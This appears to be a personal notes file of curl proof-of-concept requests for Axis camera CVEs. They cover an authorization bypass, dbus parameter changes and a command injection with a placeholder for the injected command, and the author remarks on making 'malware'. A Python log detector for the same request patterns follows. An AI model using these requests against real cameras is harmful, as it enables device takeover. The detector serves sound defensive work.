Camera Reverse Shell notes.txt
----CVE-2018-10661 – Authorization bypass vulnerability
Below is a POC that shows this bypass
_SERVER="<camera-ip>"
curl -i "http://${_SERVER}/index.html/a.srv" --data "action=abc&return_page=it_worked"
----CVE-2018-10662 – Unrestricted dbus access for users of the .srv functionality:
Below is a POC of this that enables the axis watermark overlay
_SERVER="<camera-ip>"
_PARAM_NAME="root.Image.I0.Overlay.enabled"
_PARAM_VALUE="yes"
curl "http://${_SERVER}/index.html/a.srv" --data "action=dbus&args=--system --dest=com.axis.PolicyKitParhand --type=method_call /com/axis/PolicyKitParhand com.axis.PolicyKitParhand.setParameter string:$_PARAM_NAME string:$_PARAM_VALUE"
curl "http://${_SERVER}/index.html/a.srv" --data "action=dbus&args=--system --dest=com.axis.PolicyKitParhand --type=method_call /com/axis/PolicyKitParhand com.axis.PolicyKitParhand.SynchParameters"
----CVE-2018-10660 – Shell command injection vulnerability:
Below is a POC
_SERVER="<camera-ip>"
ROOT_USER="<username>"
ROOT_PWD="<password>"
_INJECTED_COMMAND=";<insert-cmd>;"
curl --digest --user ${ROOT_USER}:${ROOT_PWD} "http://${_SERVER}/axis-cgi/param.cgi?action=update&Time.DST.Enabled=${_INJECTED_COMMAND}"
Unrelated vulnerabilities:
CVE-2018-10664 – Crashing the httpd process:
This vulnerability is triggered by issuing an HTTP request to a .cgi script URL, with a PATH_INFO that ends with the .srv extension.
CVE-2018-10663 – Information leakage vulnerability in the /bin/ssid process:
Use the CVE-2018-10661 request with action=get_htmlform&return_page=<long input, 228/300 "a"s>
CVE-2018-10658 – Crashing the /bin/ssid process:
Use the CVE-2018-10661 request with action=dbus&arg=--system --dest=com.b /com/a com.a
CVE-2018-10659 – Crashing the /bin/ssid process:
Use the CVE-2018-10661 request with action=get
from: https://web.archive.org/web/20180628070550/https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/
this might be a fun thing to test making a "malware"
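
Detection side of the requests above, as an added example (not part of the original notes or the VDOO write-up): it flags access-log lines whose path is a file followed by PATH_INFO ending in .srv (the CVE-2018-10661 / CVE-2018-10664 shape, generalized beyond /index.html/a.srv) and param.cgi updates whose decoded values contain shell metacharacters (CVE-2018-10660). Assumptions: requests to the camera pass through a proxy that writes combined-format access logs; the function names and sample lines are constructed; POST bodies are not logged, so the dbus arguments of CVE-2018-10662 are only visible through the .srv path itself.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample entries (combined log format); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2018:10:00:00 +0000] "POST /index.html/a.srv HTTP/1.1" 200 120',
    '192.0.2.10 - - [01/Jul/2018:10:00:05 +0000] "GET /axis-cgi/param.cgi/x.srv HTTP/1.1" 502 0',
    '192.0.2.11 - root [01/Jul/2018:10:01:00 +0000] "GET /axis-cgi/param.cgi?action=update&Time.DST.Enabled=%3BCMD%3B HTTP/1.1" 200 2',
    '192.0.2.12 - root [01/Jul/2018:10:02:00 +0000] "GET /axis-cgi/param.cgi?action=update&Time.DST.Enabled=yes HTTP/1.1" 200 2',
]

REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A path segment that looks like a file name, followed by extra path ending in .srv.
SRV_PATH_INFO = re.compile(r'/[^/]+\.(?P<ext>[A-Za-z0-9]+)/(?:[^/]+/)*[^/]*\.srv$')
# Characters that should never appear in a parameter value handed to a shell.
SHELL_META = re.compile(r'[;|&`$<>\n]')

def classify(line):
    """Return the list of finding labels for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    findings = []
    hit = SRV_PATH_INFO.search(url.path)
    if hit:
        # .cgi script + .srv PATH_INFO is the httpd crash; any other file is the bypass.
        is_cgi = hit.group("ext").lower() == "cgi"
        findings.append("CVE-2018-10664 pattern" if is_cgi else "CVE-2018-10661 pattern")
    if url.path.endswith("/axis-cgi/param.cgi"):
        params = parse_qsl(url.query, keep_blank_values=True)  # values are URL-decoded
        if ("action", "update") in params:
            for name, value in params:
                if name != "action" and SHELL_META.search(value):
                    findings.append(f"CVE-2018-10660 pattern ({name})")
    return findings

def scan(lines):
    """Map each flagged line to its labels; clean lines are omitted."""
    return {line: labels for line in lines if (labels := classify(line))}

if __name__ == "__main__":
    for line, labels in scan(SAMPLE_LOG).items():
        print(", ".join(labels), "<-", line)
```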